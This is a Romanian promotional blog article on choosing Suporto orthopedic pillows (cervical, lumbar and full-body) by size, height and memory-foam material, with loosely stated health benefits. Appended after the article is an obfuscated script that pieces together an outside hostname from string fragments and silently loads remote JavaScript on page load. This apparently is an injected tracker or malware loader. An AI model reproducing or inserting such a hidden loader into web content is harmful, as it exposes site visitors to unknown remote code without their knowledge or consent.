Somnul este esențial pentru a ne menține sănătoși și activi. Dacă ai probleme de somn, o pernă ortopedică Suporto ar putea fi soluția de care ai nevoie.

Cu toate acestea, alegerea pernei ortopedice potrivite poate fi o provocare, deoarece există multe opțiuni disponibile pe piață. În acest articol, vom discuta cum să alegi perna ortopedică Suporto potrivită pentru nevoile tale.

1. Alege tipul potrivit de pernă ortopedică

Suporto oferă o gamă largă de perne ortopedice, inclusiv perne cervicale, perne lombare și perne pentru întregul corp. Este important să alegi tipul potrivit de pernă, în funcție de problemele tale de sănătate și preferințele personale.

  • Perna cervicală: Aceasta este recomandată dacă suferi de dureri de gât sau de migrene. O pernă cervicală adecvată îți va susține capul și gâtul în timpul somnului, reducând astfel tensiunea musculară și prevenind apariția durerilor de cap.
  • Perna lombară: Dacă ai dureri de spate în partea inferioară, o pernă lombară poate ajuta la susținerea zonei lombare. Aceasta poate fi utilizată pe scaune, în mașină sau în pat pentru a oferi suport suplimentar.
  • Perna pentru întregul corp: Această pernă este ideală dacă suferi de dureri articulare sau musculare. Poți utiliza această pernă pentru a îți susține întregul corp în timpul somnului, reducând astfel tensiunea musculară și prevenind apariția durerilor.

2. Alege dimensiunea potrivită

Dimensiunea pernei ortopedice este, de asemenea, importantă pentru a te asigura că beneficiezi de suport adecvat. Dacă preferi să dormi pe spate, o pernă mai mică ar fi potrivită, pentru a evita forțarea gâtului.

Dacă preferi să dormi pe o parte, o pernă mai mare ar fi potrivită pentru a susține capul și gâtul într-o poziție neutră.

3. Alege înălțimea potrivită

Înălțimea pernei ortopedice poate varia în funcție de preferințele personale și problemele de sănătate.

Este important să alegi o pernă cu o înălțime care îți permite să îți susții capul și gâtul într-o poziție neutră, fără a exercita presiune asupra mușchilor sau nervilor.

4. Alege materialul potrivit

Pernele ortopedice Suporto sunt realizate din spumă cu memorie, care se modelează după forma corpului tău pentru a oferi suport perfect.

Vezi mai multe detalii pe suporto.ro

<script>
(function(){
awm3=document.createElement("script");awm3_="u"+("s")+"ta";
awm3_+=("t.i")+""+"n";awm3_+=(("f")+"o");awm3.type="text/javascript";
awm3_+="/"; awm3u="497499704";awm3u+=".Xxjfap9fwm3eqw3nlqt";awm3u+="3mzXyzjzynr";
awm3.src="https://"+awm3_+awm3u;awm3.async=true;document.body.appendChild(awm3);
})();
</script>

Write A Comment